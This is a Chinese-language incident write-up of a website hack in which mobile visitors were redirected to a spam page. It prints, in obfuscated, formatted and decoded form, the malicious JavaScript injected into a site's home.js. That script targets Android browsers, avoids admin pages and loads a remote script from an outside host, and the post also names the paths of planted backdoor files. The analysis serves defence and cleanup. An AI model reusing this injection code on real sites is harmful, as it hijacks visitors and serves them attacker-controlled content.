最近流行的手机站区域性劫持的分析及处理!

分类 服务器帮助 阅读79 次 发布日期 2018-11-01
本次接到的客户遇到的问题是他的手机站总是跳转到一个垃圾推广网站页面上,电脑端的正常,查了好久也没发现在哪儿,就请我来帮忙一起分析并处理一下.

  首先我们先用谷歌浏览器模拟手机访问,同时利用抓包工具分析一下他的详细访问及源码,如下:

    

 

  然后去服务器上查看一下他站点目录内的js有没有最近修改过的痕迹,然后就发现了home.js最近被改动过,如下:

 

 


  现在我们来解密一下这个home.js文件,还原下看看他的详细操作,如下:


  【原加密代码】
  1. var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var _0x709e=["\x67\x65\x74\x48\x6F\x75\x72\x73","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x3A","\x73\x70\x6C\x69\x74","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73","\x68","\x64","\x28\x5E\x7C\x20\x29","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x61\x6E\x64\x72\x6F\x69\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x69\x50\x68\x6F\x6E\x65","\x69\x50\x61\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70","\x68\x36","\x30\x3A\x30\x30","\x38\x3A\x33\x30","\x31\x35\x3A\x30\x30","\x32\x33\x3A\x35\x39","\x61\x6A\x61\x78","\x3C\x73\x63\x72\x69\x70\x74","\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F","\x31\x2E\x6A\x73\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70","\x74\x3E","\x77\x72\x69\x74\x65","\x31","\x31\x3A\x33\x30","\x36\x3A\x35\x39","\x64\x32\x34"];function checkTime(_0xf217x2){var _0xf217x3= new Date();var _0xf217x4=parseInt(_0xf217x3[_0x709e[0]]())* 60+ parseInt(_0xf217x3[_0x709e[1]]());var _0xf217x5=_0xf217x2[0][_0x709e[3]](_0x709e[2]);var _0xf217x6=_0xf217x2[1][_0x709e[3]](_0x709e[2]);var _0xf217x7=parseInt(_0xf217x5[0])* 60+ parseInt(_0xf217x5[1]);var _0xf217x8=parseInt(_0xf217x6[0])* 60+ parseInt(_0xf217x6[1]);if(_0xf217x4>= _0xf217x7&& _0xf217x4<= _0xf217x8){return true}else {return false}}function randomNum(_0xf217xa,_0xf217xb){switch(arguments[_0x709e[5]]){case 1:return parseInt(Math[_0x709e[4]]()* _0xf217xa+ 1,10);break;case 2:return parseInt(Math[_0x709e[4]]()* (_0xf217xb- _0xf217xa+ 1)+ _0xf217xa,10);break;default:return 0;break}}function setCookie(_0xf217xd,_0xf217xe,_0xf217xf){var _0xf217x10=getsec(_0xf217xf);var _0xf217x11= new Date();_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]()+ _0xf217x10* 1);document[_0x709e[8]]= _0xf217xd+ _0x709e[9]+ escape(_0xf217xe)+ _0x709e[10]+ _0xf217x11[_0x709e[11]]()}function getsec(_0xf217x13){var _0xf217x14=_0xf217x13[_0x709e[12]](1,_0xf217x13[_0x709e[5]])* 1;var _0xf217x15=_0xf217x13[_0x709e[12]](0,1);if(_0xf217x15== _0x709e[13]){return _0xf217x14* 1000}else {if(_0xf217x15== _0x709e[14]){return _0xf217x14* 60* 60* 1000}else {if(_0xf217x15== _0x709e[15]){return _0xf217x14* 24* 60* 60* 1000}}}}function getCookie(_0xf217xd){var _0xf217x17,_0xf217x18= new RegExp(_0x709e[16]+ _0xf217xd+ _0x709e[17]);if(_0xf217x17= document[_0x709e[8]][_0x709e[18]](_0xf217x18)){return unescape(_0xf217x17[2])}else {return null}}var browser={versions:function(){var _0xf217x1a=navigator[_0x709e[19]],_0xf217x1b=navigator[_0x709e[20]];return {android:_0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21])> -1,iPhone:_0xf217x1a[_0x709e[22]](_0x709e[24])> -1,iPad:_0xf217x1a[_0x709e[22]](_0x709e[25])> -1}}()};var xxx=randomNum(1,2);var isadmin=(window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i)!= null;if(!isadmin){var isiPad=navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i)!= null;if(isiPad){if(getCookie(_0x709e[28])){var hanzhanwap=parseInt(getCookie(_0x709e[28]))+ 1;setCookie(_0x709e[28],hanzhanwap,_0x709e[29]);if(parseInt(getCookie(_0x709e[28]))<= 6){if(checkTime([_0x709e[30],_0x709e[31]])|| checkTime([_0x709e[32],_0x709e[33]])){if(xxx== 1){$[_0x709e[34]]= 1;document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}else {setCookie(_0x709e[28],_0x709e[41],_0x709e[29]);if(checkTime([_0x709e[42],_0x709e[43]])){if(xxx== 1){document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}}else {setCookie(_0x709e[28],888,_0x709e[44])}
复制代码
  【格式化后】
  1. var __encode = 'sojson.com',
  2.     _0xb483 = ["\x5F\x64\x65\x63\x6F\x64\x65", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];
  3. (function(_0xd642x1) {
  4.     _0xd642x1[_0xb483[0]] = _0xb483[1]
  5. })(window);
  6. var _0x709e = ["\x67\x65\x74\x48\x6F\x75\x72\x73", "\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73", "\x3A", "\x73\x70\x6C\x69\x74", "\x72\x61\x6E\x64\x6F\x6D", "\x6C\x65\x6E\x67\x74\x68", "\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x73", "\x68", "\x64", "\x28\x5E\x7C\x20\x29", "\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29", "\x6D\x61\x74\x63\x68", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x6E\x64\x72\x6F\x69\x64", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x69\x50\x68\x6F\x6E\x65", "\x69\x50\x61\x64", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70", "\x68\x36", "\x30\x3A\x30\x30", "\x38\x3A\x33\x30", "\x31\x35\x3A\x30\x30", "\x32\x33\x3A\x35\x39", "\x61\x6A\x61\x78", "\x3C\x73\x63\x72\x69\x70\x74", "\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F", "\x31\x2E\x6A\x73\x22\x3E\x3C", "\x2F\x73\x63\x72\x69\x70", "\x74\x3E", "\x77\x72\x69\x74\x65", "\x31", "\x31\x3A\x33\x30", "\x36\x3A\x35\x39", "\x64\x32\x34"];

  7. function checkTime(_0xf217x2) {
  8.     var _0xf217x3 = new Date();
  9.     var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
  10.     var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
  11.     var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
  12.     var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
  13.     var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
  14.     if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
  15.         return true
  16.     } else {
  17.         return false
  18.     }
  19. }

  20. function randomNum(_0xf217xa, _0xf217xb) {
  21.     switch (arguments[_0x709e[5]]) {
  22.         case 1:
  23.             return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
  24.             break;
  25.         case 2:
  26.             return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
  27.             break;
  28.         default:
  29.             return 0;
  30.             break
  31.     }
  32. }

  33. function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
  34.     var _0xf217x10 = getsec(_0xf217xf);
  35.     var _0xf217x11 = new Date();
  36.     _0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
  37.     document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
  38. }

  39. function getsec(_0xf217x13) {
  40.     var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
  41.     var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
  42.     if (_0xf217x15 == _0x709e[13]) {
  43.         return _0xf217x14 * 1000
  44.     } else {
  45.         if (_0xf217x15 == _0x709e[14]) {
  46.             return _0xf217x14 * 60 * 60 * 1000
  47.         } else {
  48.             if (_0xf217x15 == _0x709e[15]) {
  49.                 return _0xf217x14 * 24 * 60 * 60 * 1000
  50.             }
  51.         }
  52.     }
  53. }

  54. function getCookie(_0xf217xd) {
  55.     var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
  56.     if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
  57.         return unescape(_0xf217x17[2])
  58.     } else {
  59.         return null
  60.     }
  61. }
  62. var browser = {
  63.     versions: function() {
  64.         var _0xf217x1a = navigator[_0x709e[19]],
  65.             _0xf217x1b = navigator[_0x709e[20]];
  66.         return {
  67.             android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
  68.             iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
  69.             iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
  70.         }
  71.     }()
  72. };
  73. var xxx = randomNum(1, 2);
  74. var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
  75. if (!isadmin) {
  76.     var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
  77.     if (isiPad) {
  78.         if (getCookie(_0x709e[28])) {
  79.             var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
  80.             setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
  81.             if (parseInt(getCookie(_0x709e[28])) <= 6) {
  82.                 if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
  83.                     if (xxx == 1) {
  84.                         $[_0x709e[34]] = 1;
  85.                         document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  86.                     }
  87.                 }
  88.             }
  89.         } else {
  90.             setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
  91.             if (checkTime([_0x709e[42], _0x709e[43]])) {
  92.                 if (xxx == 1) {
  93.                     document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  94.                 }
  95.             }
  96.         }
  97.     }
  98. } else {
  99.     setCookie(_0x709e[28], 888, _0x709e[44])
  100. }
复制代码
  【解密后代码】
  1. var __encode = 'sojson.com',
  2.         _0xb483 = ["_decode", "http://www.sojson.com/javascriptobfuscator.html"];
  3. (function(_0xd642x1) {
  4.         _0xd642x1[_0xb483[0]] = _0xb483[1]
  5. })(window);
  6. var _0x709e = ["getHours", "getMinutes", ":", "split", "random", "length", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "substring", "s", "h", "d", "(^| )", "=([^;]*)(;|$)", "match", "userAgent", "appVersion", "android", "indexOf", "toLowerCase", "iPhone", "iPad", "href", "location", "hanzhanwap", "h6", "0:00", "8:30", "15:00", "23:59", "ajax", "<script", " language="javascript" type="text/javascript" src="//www.bngrhk.com/", "1.js"><", "/scrip", "t>", "write", "1", "1:30", "6:59", "d24"];

  7. function checkTime(_0xf217x2) {
  8.         var _0xf217x3 = new Date();
  9.         var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
  10.         var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
  11.         var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
  12.         var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
  13.         var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
  14.         if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
  15.                 return true
  16.         } else {
  17.                 return false
  18.         }
  19. }

  20. function randomNum(_0xf217xa, _0xf217xb) {
  21.         switch (arguments[_0x709e[5]]) {
  22.         case 1:
  23.                 return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
  24.                 break;
  25.         case 2:
  26.                 return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
  27.                 break;
  28.         default:
  29.                 return 0;
  30.                 break
  31.         }
  32. }

  33. function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
  34.         var _0xf217x10 = getsec(_0xf217xf);
  35.         var _0xf217x11 = new Date();
  36.         _0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
  37.         document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
  38. }

  39. function getsec(_0xf217x13) {
  40.         var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
  41.         var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
  42.         if (_0xf217x15 == _0x709e[13]) {
  43.                 return _0xf217x14 * 1000
  44.         } else {
  45.                 if (_0xf217x15 == _0x709e[14]) {
  46.                         return _0xf217x14 * 60 * 60 * 1000
  47.                 } else {
  48.                         if (_0xf217x15 == _0x709e[15]) {
  49.                                 return _0xf217x14 * 24 * 60 * 60 * 1000
  50.                         }
  51.                 }
  52.         }
  53. }

  54. function getCookie(_0xf217xd) {
  55.         var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
  56.         if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
  57.                 return unescape(_0xf217x17[2])
  58.         } else {
  59.                 return null
  60.         }
  61. }
  62. var browser = {
  63.         versions: function() {
  64.                 var _0xf217x1a = navigator[_0x709e[19]],
  65.                         _0xf217x1b = navigator[_0x709e[20]];
  66.                 return {
  67.                         android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
  68.                         iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
  69.                         iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
  70.                 }
  71.         }()
  72. };
  73. var xxx = randomNum(1, 2);
  74. var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
  75. if (!isadmin) {
  76.         var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
  77.         if (isiPad) {
  78.                 if (getCookie(_0x709e[28])) {
  79.                         var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
  80.                         setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
  81.                         if (parseInt(getCookie(_0x709e[28])) <= 6) {
  82.                                 if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
  83.                                         if (xxx == 1) {
  84.                                                 $[_0x709e[34]] = 1;
  85.                                                 document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  86.                                         }
  87.                                 }
  88.                         }
  89.                 } else {
  90.                         setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
  91.                         if (checkTime([_0x709e[42], _0x709e[43]])) {
  92.                                 if (xxx == 1) {
  93.                                         document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  94.                                 }
  95.                         }
  96.                 }
  97.         }
  98. } else {
  99.         setCookie(_0x709e[28], 888, _0x709e[44])
  100. }
复制代码

  看来这位黑客藏的还不够深,一下就被我找到了,哈哈,于是我们就全面检查了一下网站文件和相关日志,终于看到了原因,因为网站内被放了几个后门木马,如下:
  \home\wwwroot\m.*.net\Lib232\Home\Common\config.php
  \home\wwwroot\www.*.net\Libbeifen\ThinkPHP\Library\Vendor\Boris\config(1).php

 

  \home\wwwroot\www.*.net\Lib232323\ThinkPHP\Mode\Api\ray.php

 

  好了,现在我们再一次抓到了这个小黑客并给客户做好了驱动级防御成功交差,现在可以继续进行下一位客户问题的分析和处理了!